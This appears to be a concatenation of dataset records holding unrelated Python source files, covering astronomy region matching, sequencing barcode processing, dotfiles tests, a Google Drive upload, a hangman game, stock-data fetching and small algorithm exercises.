distdic.keys():\n lll_1 = lll.split('{')[0]\n newregfile.write(lll_1+'{'+distdic[lll[6:28]]+'}\\n')\n\nrebull_ICRS_Gaia.close() \nnewregfile.close()\nos.system('cp ds9.reg rebull_ICRS_Gaia.reg')\n\n################## query based on 2MASS name\n\nos.system('cp rebull_raw_2MASS.reg rebull_2MASS_Gaia.reg') # template region file to show Gaia results\n\nrebull_2MASS_Gaia = np.loadtxt('rebull_2MASS_Gaia.txt',dtype='string')\nrows, cols = rebull_2MASS_Gaia.shape\ndistdic = {}\nfor rr in range(rows):\n kk = str(rebull_2MASS_Gaia[rr,1]) # Jxxxxxxxx+xxxxxxx\n dd = int(float(rebull_2MASS_Gaia[rr,6])) # rest distance in pc\n distdic[kk] = str(dd)\n\nrebull_2MASS_Gaia = open('rebull_2MASS_Gaia.reg', 'r')\nnewregfile = open('ds9.reg','w') \nreglines = rebull_2MASS_Gaia.readlines()\nreghead = reglines[:3]\nregdata = reglines[3:]\nfor ll in reghead:\n newregfile.write(ll)\nfor lll in regdata:\n if lll[-19:-2] in distdic.keys(): # Jxxxxxxxx+xxxxxxx\n lll_1 = lll.split('{')[0]\n newregfile.write(lll_1+'{'+distdic[lll[-19:-2]]+'}\\n')\n\nrebull_2MASS_Gaia.close() \nnewregfile.close()\nos.system('cp ds9.reg rebull_2MASS_Gaia.reg')\n","sub_path":"matchGaia.py","file_name":"matchGaia.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"400053593","text":"\"\"\"\nCreated on Tue Aug 23 18:12:22 2019\n\n@author: cyrille\n\"\"\"\n\nimport numpy as np\nimport os\nimport subprocess\nimport shlex\nimport gzip\nimport matplotlib.pyplot as plt\n\nimport Levenshtein\nfrom scipy.signal import savgol_filter\nfrom scipy.signal import find_peaks\n\ndef hamming(s1, s2):\n str_len = np.argsort([len(s1), len(s2)])\n s1, s2 = np.array([s1, s2])[str_len]\n s1 = s1+(len(s2)-len(s1))*'N'\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\n\ndef rev_comp(seq):\n \"\"\"reverse complement a string\"\"\"\n relation = {'A':'T', 'T':'A', 'C':'G', 'G':'C', 'N':'N'}\n return ''.join(relation[s] for s in seq[::-1])\n\ndef find_chars(string, ch):\n \"\"\"finds all the occurences of character in string and\n returns an array with the start and end indices\n of consecutive character occurences.\n \n find_chars('aNacagNNNtt', 'N') retruns array([[1, 2], [6, 9]])\n \n useful to specify barcode structures as string\"\"\"\n locs = [i for i, ltr in enumerate(string) if ltr == ch]\n gaps = [[s, e] for s, e in zip(locs, locs[1:]) if s+1 < e]\n edges = iter(locs[:1] + sum(gaps, []) + locs[-1:])\n return np.array([(s, e+1) for s, e in zip(edges, edges)]).astype(int)\n\ndef from_fastq(handle):\n \"\"\"Generater to yield four fastq lines at a time\"\"\" \n while True:\n name = next(handle).rstrip()[1:]\n seq = next(handle).rstrip()\n next(handle)\n qual = next(handle).rstrip()\n if not name:\n break\n yield name, seq, qual\n\nclass seq_experiment(object):\n \"\"\"Class contains methods to evaluate a paired end read of an amplicon panel\n single cell sequencing experiment like tapestri\"\"\"\n \n def __init__(self, bc_list, bcerror_tolerance):\n self.R1_files = []\n self.R2_files = []\n self.bc1_l = bc_list[0]\n self.bc2_l = bc_list[1]\n self.bc3_l = bc_list[2]\n self.bcerror_tolerance = bcerror_tolerance\n self.perror_tolerance = 0\n self.bc3_correction_dic = {}\n self.bc2_correction_dic = {}\n self.bc1_correction_dic = {}\n self.bc_groups = {}\n self.read_to_bc = {}\n self.cell_barcodes = None # barcode list that were determeined to be associated with true cells\n\n class _read(object):\n \"\"\"Just a container to keep some data together\"\"\"\n \n def __init__(self, idx1, idx2, seq1, seq2, qual1, qual2):\n \"\"\"init function to set up the data structure\"\"\"\n self.idx1 = idx1\n self.idx2 = idx2\n self.seq1 = seq1\n self.seq2 = seq2\n self.qual1 = qual1\n self.qual2 = qual2\n \n def process_barcodes(self, R1_file, R2_file, handle, verbose=True, cleanup=True, \n rev_complement_s2 = False, ligation_scar ='CCTAGTACTCGCAGTAGTC'):\n \"\"\"function to extract barcodes from R1 file and correct for sequencing/PCR errors against white list. Invokes the \n program Cutadapt from the commandline\"\"\"\n self.R1_files.append(R1_file)\n self.R2_files.append(R2_file)\n # naive approach to log some read statistics\n failed_barcodes_ambigous = 0\n failed_barcodes_error_thresh = 0\n good_reads = 0\n total_processed = 0\n corrected_reads = 0\n \n # use of the external cutadapt program to efficiently search for common \n # handle sequences if cleanup is set to 'True' files will get deleted after use\n _name = R1_file.split('.fastq.')[1]\n cutadapt_command = 'cutadapt -g {} -A {} -o {} -p {} {} {} -q 20 -e 0.075 -O 9 -j 3 --discard-untrimmed'.format(ligation_scar, ligation_scar, _name+'_read.fastq.gz', _name+'_bc.fastq.gz', R1_file, R1_file)\n subprocess.call(shlex.split(cutadapt_command), stdout=subprocess.PIPE)\n \n bc_pos = find_chars(handle, 'N') - len(handle)\n \n self._temp_read = {}\n with gzip.open(_name+'_bc.fastq.gz', 'rt') as f0, gzip.open(_name+'_read.fastq.gz', 'rt') as f1:\n for ((id0, seq_bc, qual_bc), (ID, seq, qual1)) in zip(from_fastq(f0), from_fastq(f1)):\n assert id0.split(' ')[0] == ID.split(' ')[0]\n ID1 = ID.split(' ')[0]\n total_processed += 1\n BC1, BC2, BC3 = seq_bc[bc_pos[0,0]:bc_pos[0,1]], seq_bc[bc_pos[1,0]:bc_pos[1,1]], seq_bc[bc_pos[2,0]:]\n \n bc1, d1, a1, self.bc1_correction_dic = self.barcode_matcher(BC1, self.bc1_l, self.bc1_correction_dic)\n bc2, d2, a2, self.bc2_correction_dic = self.barcode_matcher(BC2, self.bc2_l, self.bc2_correction_dic)\n bc3, d3, a3, self.bc3_correction_dic = self.barcode_matcher(BC3, self.bc3_l, self.bc3_correction_dic)\n \n if a1 + a2 + a3 > 3:\n failed_barcodes_ambigous += 1\n continue\n if d1 or d2 or d3 > self.bcerror_tolerance:\n failed_barcodes_error_thresh += 1\n continue\n\n elif d1+d2+d3 >= 0:\n if d1+d2+d3 == 0:\n good_reads += 1\n else:\n corrected_reads += 1\n self._temp_read[ID1]={'bc':bc1+bc2+bc3, 'seq':seq, 'qual':qual1, 'id':ID}\n \n \n with gzip.open(R2_file, 'rt') as f2:\n for (id2, seq2, qual2) in from_fastq(f2):\n ID2 = id2.split(' ')[0]\n try:\n bc, seq1, qual1, id1 = self._temp_read[ID2]['bc'], self._temp_read[ID2]['seq'], self._temp_read[ID2]['qual'], self._temp_read[ID2]['id']\n except KeyError:\n continue\n if rev_complement_s2:\n read = self._read(id1, id2, seq1, rev_comp(seq2), qual1, qual2[::-1])\n else:\n read = self._read(id1, id2, seq1, seq2, qual1, qual2)\n try:\n self.bc_groups[bc][ID2] = read\n self.read_to_bc[ID2] = bc1+bc2+bc3\n except KeyError:\n self.bc_groups[bc] = {ID2 : read}\n self.read_to_bc[ID2] = bc1+bc2+bc3\n \n if verbose:\n print('total reads processed: {}'.format(total_processed))\n print('reads with ambigous barcodes: {}'.format(failed_barcodes_ambigous))\n print('reads failed barcode error threshold: {}'.format(failed_barcodes_error_thresh))\n print('total flawless reads: {}'.format(good_reads))\n print('total corrected reads: {}'.format(corrected_reads))\n \n if cleanup:\n os.remove(_name+'_read.fastq.gz')\n os.remove(_name+'_bc.fastq.gz')\n #os.remove(R2_file.split('.fastq.')[1]+'_r2.fastq.gz')\n \n @staticmethod\n def barcode_matcher(bc, bc_list, bc_correction_dic):\n \"\"\" \n matches barcodes to the white list of allowed barcodes\n output dictionary of perfect matches and a second dictionary of barcodes\n with a smaller Levenshtein distance than set in dissimilarity_tolerance.\n \"\"\"\n if bc in bc_list:\n diss = 0\n ambig = 1\n else:\n try:\n bc_new, diss, dissH, ambig = bc_correction_dic[bc]\n except KeyError:\n dissimilarity = np.ones(len(bc_list))\n dissimilarityH = np.ones(len(bc_list))\n for i, bc1 in enumerate(bc_list):\n try:\n dissimilarity[i] = Levenshtein.distance(bc, bc1)\n dissimilarityH[i] = hamming(bc, bc1)\n except TypeError:\n print(bc, bc1)\n sys.exit()\n diss = np.min(dissimilarity)\n dissH = np.min(dissimilarityH)\n ambig = sum(dissimilarity==diss)\n if ambig > 1:\n bc_new = 'AMBIG'\n else:\n bc_new = np.array(bc_list)[dissimilarity==diss][0]\n bc_correction_dic[bc] = (bc_new, diss, dissH, ambig)\n bc = bc_new\n return bc, diss, ambig, bc_correction_dic\n\n def call_cells(self, plot=True):\n \"\"\"call cells using the knee method, returns list of valid cell barcodes.\"\"\"\n # count reads per barcode\n bcs = []\n reads = []\n for i in self.bc_groups.items():\n bcs.append(i[0])\n reads.append(len(i[1]))\n reads, bcs = (list(t) for t in zip(*sorted(zip(reads, bcs), reverse=True)))\n\n # second derivative method (inflection point) of the knee plot to identify cells\n # 1 - first derivative of cell rank plot\n # exclude barcodes with low numbers of reads\n rpc_thresh = [x for x in reads if x >= 100]\n\n x = np.log10(range(1, len(rpc_thresh) + 1))\n y = np.log10(np.array(rpc_thresh))\n\n dy = np.zeros(y.shape, np.float)\n dy[0:-1] = np.diff(y) / np.diff(x)\n dy[-1] = (y[-1] - y[-2]) / (x[-1] - x[-2])\n\n dy = -dy # invert for positive graph\n\n # smooth the data by savgol filtering and call first peak\n try:\n yhat = savgol_filter(dy, int(len(dy)/5), 3) # window size, polynomial order\n except ValueError:\n yhat = savgol_filter(dy, int(len(dy)/5)+1, 3) # window size, polynomial order\n\n # prominence of peak (0.1 should be adequate for most mammalian cell panels)\n prominence = 0.1\n\n peaks = find_peaks(yhat, prominence=prominence)\n max_peak_i = np.argmax(peaks[1]['prominences'])\n max_peak = peaks[0][max_peak_i]\n\n # first n cell barcodes are valid\n n_cells = max_peak #n_cells = int(bin_centers[max_peak])\n self.cell_barcodes = np.sort(bcs[:n_cells])\n\n if plot:\n cells=[]\n\n for i, j in zip(self.bc_groups.values(), self.bc_groups.keys()):\n cells.append(len(i))\n cells = np.array(cells)\n \n fig, (ax1, ax2) = plt.subplots(2,1, figsize=(8,8), sharex=True)\n l1 = ax1.plot(np.sort(cells[cells>5])[::-1])\n ax1.plot([n_cells, n_cells],[300, np.max(cells)], 'k:')\n ax1.set_yscale('log')\n ax1.set_title('read per barcode distribution')\n ax1.set_xlabel('barcode goup rank')\n ax1.set_ylabel('log read per barcode count')\n\n ax2.plot(range(len(yhat)),yhat)\n ax2.set_title('Savitzky-Golay filter smoothed read counts')\n ax2.set_xlabel('barcode goup rank')\n ax2.set_ylabel('dy/dx')\n plt.savefig('qc_output/Cell_calling.png', dpi=600)\n plt.show()\n\n def write_interleaved_fastq(self, output_path, barcodes=False):\n \"\"\"Function to write all the reads from a single cell to an interleaved\n fastq.gz file\"\"\"\n \n if not barcodes:\n barcodes = self.cell_barcodes\n \n file_name_list = []\n for bc in barcodes:\n f_name = bc + '.fastq.gz'\n with gzip.open(os.path.join(output_path, f_name), 'wt') as f:\n for i in self.bc_groups[bc].values():\n f.write('@'+i.idx1+'\\n'+i.seq1+'\\n'+'+\\n'+i.qual1+'\\n')\n f.write('@'+i.idx2+'\\n'+i.seq2+'\\n'+'+\\n'+i.qual2+'\\n')\n file_name_list.append(f_name)\n return file_name_list\n \n def write_r1_fastq(self, output_path, barcodes=False):\n \"\"\"Function to write all rthe reads from a single cell to an interleaved\n fastq.gz file\"\"\"\n \n if not barcodes:\n barcodes = self.cell_barcodes\n \n f_name = 'read1.fastq.gz'\n with gzip.open(os.path.join(output_path, f_name), 'wt') as f:\n for bc in barcodes:\n for i in self.bc_groups[bc].values():\n f.write('@'+i.idx1.split()[1]+'_'+bc+'\\n'+i.seq1+'\\n'+'+\\n'+i.qual1+'\\n')\n return\n \n def write_r2_fastq(self, output_path, barcodes=False):\n \"\"\"Function to write all the reads from a single cell to an interleaved\n fastq.gz file\"\"\"\n \n if not barcodes:\n barcodes = self.cell_barcodes\n \n f_name = 'read2.fastq.gz'\n with gzip.open(os.path.join(output_path, f_name), 'wt') as f:\n for bc in barcodes:\n for i in self.bc_groups[bc].values():\n f.write('@'+i.idx2.split()[1]+'_'+bc+'\\n'+i.seq2+'\\n'+'+\\n'+i.qual2+'\\n')\n return\n\n\n","sub_path":"Amplicon/barcode_methods.py","file_name":"barcode_methods.py","file_ext":"py","file_size_in_byte":12503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"476549754","text":"import pytest\nimport py.path\n\nfrom dotfiles.repository import Repository, \\\n DEFAULT_REMOVE_LEADING_DOT, DEFAULT_IGNORE_PATTERNS\nfrom dotfiles.exceptions import NotRootedInHome, InRepository, TargetIgnored, \\\n IsDirectory\n\n\ndef test_repo_create(repo):\n repo.path.remove()\n assert repo.path.check(exists=0)\n Repository(repo.path, repo.homedir)\n assert repo.path.check(exists=1, dir=1)\n\n\n@pytest.mark.parametrize('remove_leading_dot',\n [DEFAULT_REMOVE_LEADING_DOT,\n not DEFAULT_REMOVE_LEADING_DOT])\n@pytest.mark.parametrize('ignore_patterns', [DEFAULT_IGNORE_PATTERNS,\n ['foo', 'bar', 'baz']])\ndef test_repo_params(repo, remove_leading_dot, ignore_patterns):\n _repo = Repository(repo.path,\n remove_leading_dot=remove_leading_dot,\n ignore_patterns=ignore_patterns,\n homedir=repo.homedir)\n assert _repo.path == repo.path\n assert _repo.homedir == repo.homedir\n assert _repo.remove_leading_dot == remove_leading_dot\n assert _repo.ignore_patterns == ignore_patterns\n\n\ndef test_str(repo):\n repo.path.ensure('a')\n repo.path.ensure('b')\n repo.path.ensure('c')\n assert str(repo) == (\n '%s\\n%s\\n%s' % (repo.homedir.join('.a'),\n repo.homedir.join('.b'),\n repo.homedir.join('.c')))\n\n\n@pytest.mark.parametrize('path', ['.foo', '.foo/bar/baz'])\ndef test_dotfile_path(repo, path):\n repo.remove_leading_dot = False\n assert (repo._dotfile_path(repo.path.join(path)) ==\n repo.homedir.join(path))\n repo.remove_leading_dot = True\n assert (repo._dotfile_path(repo.path.join(path)) ==\n repo.homedir.join('.%s' % path))\n\n\n@pytest.mark.parametrize('path', ['.foo', '.foo/bar/baz'])\ndef test_dotfile_target(repo, path):\n repo.remove_leading_dot = False\n assert (repo._dotfile_target(repo.homedir.join(path)) ==\n repo.path.join(path))\n repo.remove_leading_dot = True\n assert (repo._dotfile_target(repo.homedir.join(path)) ==\n repo.path.join(path[1:]))\n\n\ndef test_dotfile(repo):\n with pytest.raises(NotRootedInHome):\n repo._dotfile(py.path.local('/tmp/foo'))\n with pytest.raises(TargetIgnored):\n repo.ignore_patterns = ['.foo']\n repo.remove_leading_dot = False\n repo._dotfile(py.path.local(repo.homedir.join('.foo')))\n with pytest.raises(TargetIgnored):\n repo.ignore_patterns = ['foo']\n repo._dotfile(repo.homedir.join('.bar/foo'))\n with pytest.raises(IsDirectory):\n repo._dotfile(repo.homedir.ensure_dir('.config'))\n\n # The repo fixture is parametrized, we can only expect InRepository\n # exception when the repository is contained in the home directory.\n if repo.path.dirname == repo.homedir.basename:\n with pytest.raises(InRepository):\n repo._dotfile(repo.path.join('.foo/bar'))\n\n repo._dotfile(repo.homedir.join('.foo'))\n\n\ndef test_dotfiles(repo):\n file = repo.homedir.join('.baz')\n dir = repo.homedir.ensure_dir('.dir')\n dir.ensure('foo/bat')\n dir.ensure('foo/buz')\n dir.ensure('bar')\n dir.ensure('boo')\n\n dotfiles = repo.dotfiles([str(file), str(dir)])\n assert len(dotfiles) == 5\n\n\ndef test_contents(repo):\n assert repo.contents() == []\n\n target_a = repo.path.ensure('a')\n target_b = repo.path.ensure('b/b')\n target_c = repo.path.ensure('c/c/c')\n contents = repo.contents()\n\n assert contents[0].target == target_a\n assert contents[1].target == target_b\n assert contents[2].target == target_c\n\n\ndef test_prune(repo):\n repo.path.ensure_dir('.a/a')\n repo.path.ensure_dir('.b/b/b/b')\n repo.path.ensure_dir('.c/c/c/c/c/c/c/c')\n\n repo.prune()\n assert len(repo.path.listdir()) == 0\n","sub_path":"tests/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"7256478","text":"import json\nimport os\nimport tempfile\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.http import MediaFileUpload\nfrom oauth2client.client import GoogleCredentials\nfrom typing import List\n\nfrom jobs.convert import Convert\n\n\ndef push_gdoc(paths: List[str], project: str, source: dict):\n \"\"\"\n Push google doc using given user token\n \"\"\"\n assert \"doc_id\" in source, \"source must have a doc_id\"\n assert \"token\" in source, \"source must include a token\"\n assert len(paths) == 1, \"paths must contain exactly one item\"\n\n docx = tempfile.NamedTemporaryFile(delete=False)\n convert = Convert()\n current = {}\n\n def update_state(state, meta):\n current[\"state\"] = state\n current[\"meta\"] = meta\n\n convert.update_state = update_state\n json_file = os.path.join(project, paths[0])\n\n convert.run(json_file, docx.name, {\"from\": \"gdoc\", \"to\": \"docx\"})\n\n credentials = GoogleCredentials(\n source[\"token\"], None, None, None, None, None, \"Stencila Hub Client\",\n )\n drive_service = build(\"drive\", \"v3\", credentials=credentials, cache_discovery=False)\n files_resource = drive_service.files()\n\n media = MediaFileUpload(docx.name)\n files_resource.update(fileId=source[\"doc_id\"], media_body=media).execute()\n\n os.unlink(docx.name)\n","sub_path":"worker/jobs/push/gdoc.py","file_name":"gdoc.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"156481496","text":"import random # essa instrução importa uma biblioteca da internet. \npalavras = [] #essa instrução cria uma lista.\n\n\n\nletrasErradas = ''#essa instrução cria uma variável, que é o mesmo que uma lista uma com apenas um valor.\nletrasCertas = ''\nFORCAIMG = ['''\n \n +---+\n | |\n |\n |\n |\n |\n=========''','''\n \n +---+\n | |\n O |\n |\n |\n |\n=========''','''\n \n +---+\n | |\n O |\n | |\n |\n |\n=========''','''\n \n +---+\n | |\n O |\n /| |\n |\n |\n=========''','''\n \n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========''','''\n \n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========''','''\n \n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========''']\n\ndef inserir (): # inserir as palavras que a pessoa digitar.\n while True:\n x= input(\"Digite a palavra: \")\n palavras.append(x)\n if x == \"\": #se a variavel x estiver vazia o jogo para de pedir palavras\n break\ndef principal(): #A instrução def é utilizada em Phyton para \"criar\" funções.\n \"\"\"\n Função Princial do programa\n \"\"\"\n print('F O R C A') #imprime determinada mensagem na tela.\n inserir ()\n palavraSecreta = sortearPalavra()\n palpite = ''\n desenhaJogo(palavraSecreta,palpite)\n\n while True: # executa o bloco enquanto a condição for verdadeira.\n palpite = receberPalpite() \n desenhaJogo(palavraSecreta,palpite)\n if perdeuJogo(): # essa instrução significa se, ela executa o bloco se a condição nela for verdadeira.\n print('Voce Perdeu!!!')\n break # para de rodar o bloco se a condição for verdadeira ou falsa dependendo do seu if.\n if ganhouJogo(palavraSecreta):\n print('Voce Ganhou!!!')\n break \n \ndef perdeuJogo():\n global FORCAIMG # essa instrução indica que esse comando é global e não local, ele vai puxar uma nova variável que ta fora do bloco.\n if len(letrasErradas) == len(FORCAIMG): \n return True \n else:\n return False \n \ndef ganhouJogo(palavraSecreta):\n global letrasCertas\n ganhou = True\n for letra in palavraSecreta: #A instrução for em Phyton cria um laço de repetição ele irá realizar uma sequencia de forma ordenada e acabará alterando valores que são especificados em variáveis por você.\n if letra not in letrasCertas:\n ganhou = False \n return ganhou \n \n\n\ndef receberPalpite():\n \n palpite = input(\"Adivinhe uma letra: \")\n palpite = palpite.upper()\n if len(palpite) != 1: # o len retorna o tamanho da lista.\n print('Coloque um unica letra.')\n elif palpite in letrasCertas or palpite in letrasErradas: #elif significa se ou se não essa condição é verdadeira.\n print('Voce ja disse esta letra.')\n elif not \"A\" <= palpite <= \"Z\": # se o palpite não estiver entre a e z irá imprimir na tela \"por favor escolha apenas letras\".\n print('Por favor escolha apenas letras')\n else: # essa instrução é ativada se o if for falso.\n return palpite #return define o que vai retornar quando você chamar a função.\n \n \ndef desenhaJogo(palavraSecreta,palpite): \n global letrasCertas\n global letrasErradas\n global FORCAIMG\n\n print(FORCAIMG[len(letrasErradas)])\n \n \n vazio = len(palavraSecreta)*'-'\n \n if palpite in palavraSecreta: \n letrasCertas += palpite\n else:\n letrasErradas += palpite \n\n for letra in letrasCertas:\n for x in range(len(palavraSecreta)):\n if letra == palavraSecreta[x]:\n vazio = vazio[:x] + letra + vazio[x+1:]\n \n print('Acertos: ',letrasCertas )\n print('Erros: ',letrasErradas)\n print(vazio)\n \n\ndef sortearPalavra(): # essa função pega todas as palavras da função palavra secreta e retorna uma aleatória.\n global palavras\n return random.choice(palavras).upper()\n\n \nprincipal()\n","sub_path":"adila-forca.py","file_name":"adila-forca.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"519901119","text":"# Big-O analysis\n# Time Complexity: O(n^2)\n# Space Complexity: O(n)\n\n# the space complexity is O(N) because the recursive function grows linearly\n# relative to the input. e.g:\n# f(O) = 0\n# f(1) = 0\n# f(2) = 1\n\ndef countdown_recursive(n):\n if n == 0: # n operations\n print(\"Blast off\") # 1 operation\n else:\n print(n) # 1 operation\n countdown_recursive(n - 1) # n operations\n# 1 + 1 + n * n\n# 2 + n**2\n","sub_path":"Adrian-Francis/Big-O-Notation/CountDown-Recursive/count_down_recursive.py","file_name":"count_down_recursive.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"652567823","text":"#!/usr/bin/env python\n\nimport sys\nimport csv\nimport Queue\nimport threading\nimport ystockquote as ys\n\n\ndef gen_info_list(tickers, start, end):\n '''\n Given a list of ticker symbols, a start date, and an end date, return a\n list of dictionaries containing the information.\n '''\n return [{'symbol': ticker, \\\n 'start': start, \\\n 'end': end} \\\n for ticker in tickers]\n\nclass FetcherThread(threading.Thread):\n\n def __init__(self, in_queue, out_queue):\n threading.Thread.__init__(self)\n self.in_queue = in_queue\n self.out_queue = out_queue\n\n def run(self):\n while True:\n spec = self.in_queue.get()\n data = ys.get_historical_prices(spec['symbol'], spec['start'], spec['end'])\n spec.update({'data': data})\n\n # Emit a new dictionary equivalent to spec but with a new key 'data'\n # containing the price data.\n self.out_queue.put(spec)\n self.in_queue.task_done()\n\n\nclass WriterThread(threading.Thread):\n '''\n A class to perform concurrent writes to the file system.\n '''\n\n def __init__(self, queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def __decorate(self, symbol, start, end):\n return '_'.join([symbol, start, end]) + '.csv'\n\n def run(self):\n while True:\n spec = self.queue.get()\n filename = spec['symbol']\n with open(filename, 'wb') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n writer.writerows(spec['data'])\n self.queue.task_done()\n\ndef main():\n with open('tickers.txt') as tickersFile:\n tickers = tickersFile.readlines()\n start_date = '20000101'\n end_date = '20170206'\n in_queue = Queue.Queue()\n out_queue = Queue.Queue()\n\n # Populate the in_queue with data\n for symbol in tickers:\n symbol = symbol.strip(\"\\n\")\n packet = {'symbol': symbol, 'start': start_date, 'end': end_date}\n in_queue.put(packet)\n\n # Spawn a pool of fetcher threads\n for i in range(4):\n t = FetcherThread(in_queue, out_queue)\n t.setDaemon(True)\n t.start()\n\n for i in range(4):\n w = WriterThread(out_queue)\n w.setDaemon(True)\n w.start()\n\n # Wait on the queues until everything has been processed\n in_queue.join()\n out_queue.join()\n\n\nif __name__ == '__main__':\n main()","sub_path":"dataScript/YahooDataGrabber.py","file_name":"YahooDataGrabber.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"525206681","text":"my_file = open(\"encoded_zen_lines.txt\", \"r\")\nout_file = open(\"decoded_zen_lines.txt\", \"w\")\nlines = my_file.readlines()\n\nfor line in lines:\n words = line.split(\" \")\n decoded_line = []\n for word in words:\n decoded_word = \"\"\n for char in word:\n decoded_word += chr(ord(char)-1)\n decoded_line.append(decoded_word)\n print(\" \".join(decoded_line))\n out_file.write(\" \".join(decoded_line) + \"\\n\")\nmy_file.close()\nout_file.close()\n","sub_path":"week-4/tue/decoded.py","file_name":"decoded.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"127339066","text":"import re\n\ndef censor(input):\n pattern = re.compile(r'frack\\w*', re.I)\n result = pattern.sub(\"CENSORED\", input)\n\n return result\n\nprint( censor('Frack you') )\nprint( censor('I hope you fracking die') )\nprint( censor('you fracking frack') )\n","sub_path":"tutorial/bootcamp/reg-exp/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"281616001","text":"#!/usr/bin/env python\nimport random\nfrom dominion.CardPile import CardPile\n\n\n###############################################################################\nclass RuinCardPile(CardPile):\n def __init__(self, game, pile_size):\n self.mapping = game.get_card_classes(\"RuinCard\", game.paths[\"cards\"], \"Card_\")\n super().__init__(cardname=\"Ruins\", klass=None, game=game, pile_size=pile_size)\n\n def init_cards(self):\n for _ in range(self.pile_size):\n c = random.choice(list(self.mapping.keys()))\n self._cards.append(self.mapping[c]())\n\n\n# EOF\n","sub_path":"dominion/RuinCardPile.py","file_name":"RuinCardPile.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"297715499","text":"from datetime import datetime\n\nfrom nose.tools import eq_\n\nimport amo.tests\nfrom mkt.constants import apps\nfrom mkt.site.fixtures import fixture\nfrom mkt.stats import search\nfrom mkt.webapps.models import Installed\nfrom users.models import UserProfile\n\n\nclass InstalledTests(amo.tests.TestCase):\n fixtures = fixture('user_999')\n\n def setUp(self):\n self.user = UserProfile.objects.get(username='regularuser')\n self.first_app = amo.tests.app_factory(name='public',\n app_slug='pub', type=1, status=4, public_stats=True)\n self.second_app = amo.tests.app_factory(name='private',\n app_slug='priv', type=1, status=4, public_stats=False)\n\n def test_no_installs(self):\n data = {'created': datetime.now(),\n 'addon': self.first_app.id}\n result = search.get_installed_daily(data)\n eq_(result['date'], data['created'].date())\n eq_(result['addon'], data['addon'])\n eq_(result['count'], 0)\n\n def test_only_one_app(self):\n Installed.objects.create(addon=self.first_app, user=self.user,\n install_type=apps.INSTALL_TYPE_USER)\n data = {'created': datetime.now(),\n 'addon': self.first_app.id}\n result = search.get_installed_daily(data)\n eq_(result['date'], data['created'].date())\n eq_(result['addon'], data['addon'])\n eq_(result['count'], 1)\n\n def test_multiple_installs(self):\n # Due to the unique together we use different install types to deal\n # with that constraint.\n Installed.objects.create(addon=self.first_app, user=self.user,\n install_type=apps.INSTALL_TYPE_USER)\n Installed.objects.create(addon=self.first_app, user=self.user,\n install_type=apps.INSTALL_TYPE_DEVELOPER)\n data = {'created': datetime.now(),\n 'addon': self.first_app.id}\n result = search.get_installed_daily(data)\n eq_(result['date'], data['created'].date())\n eq_(result['addon'], data['addon'])\n eq_(result['count'], 2)\n\n def test_two_apps(self):\n Installed.objects.create(addon=self.first_app, user=self.user,\n install_type=apps.INSTALL_TYPE_USER)\n Installed.objects.create(addon=self.second_app, user=self.user,\n install_type=apps.INSTALL_TYPE_USER)\n data = {'created': datetime.now(),\n 'addon': self.first_app.id}\n result = search.get_installed_daily(data)\n eq_(result['date'], data['created'].date())\n eq_(result['addon'], data['addon'])\n eq_(result['count'], 1)\n","sub_path":"mkt/stats/tests/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"413525277","text":"\"\"\"\nGiven an integer array nums, find a contiguous non-empty subarray within the array that has the largest product, and return the product.\n\nIt is guaranteed that the answer will fit in a 32-bit integer.\n\nA subarray is a contiguous subsequence of the array.\n\n\n\nExample 1:\n\nInput: nums = [2,3,-2,4]\nOutput: 6\nExplanation: [2,3] has the largest product 6.\nExample 2:\n\nInput: nums = [-2,0,-1]\nOutput: 0\nExplanation: The result cannot be 2, because [-2,-1] is not a subarray.\n\n\nConstraints:\n\n1 <= nums.length <= 2 * 104\n-10 <= nums[i] <= 10\nThe product of any prefix or suffix of nums is guaranteed to fit in a 32-bit integer.\n\"\"\"\n\nimport math\n\n\ndef max_product(a):\n n = len(a)\n if n == 0:\n return 0\n res = -math.inf\n product_from_front = 1\n product_from_back = 1\n for i in range(n):\n product_from_front *= a[i]\n product_from_back *= a[n - 1 - i]\n res = max(res, product_from_front, product_from_back)\n if not product_from_front:\n product_from_front = 1\n if not product_from_back:\n product_from_back = 1\n return res\n\n\nif __name__ == \"__main__\":\n # array = [2, 3, -2, 4]\n array = [-2, 3, -4]\n\n print(max_product(array))\n print(array)\n","sub_path":"DSA/leetcodepractice/array/152_Maximum_Product_Subarray.py","file_name":"152_Maximum_Product_Subarray.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"564645767","text":"import pygame\nimport ship\nimport menu\nimport settings\nimport grid\nimport networking.client\nimport networking.server\nimport random\nfrom networking.packet import Packet\nimport color\nfrom crosshair import Crosshair\nfrom hitmarker import 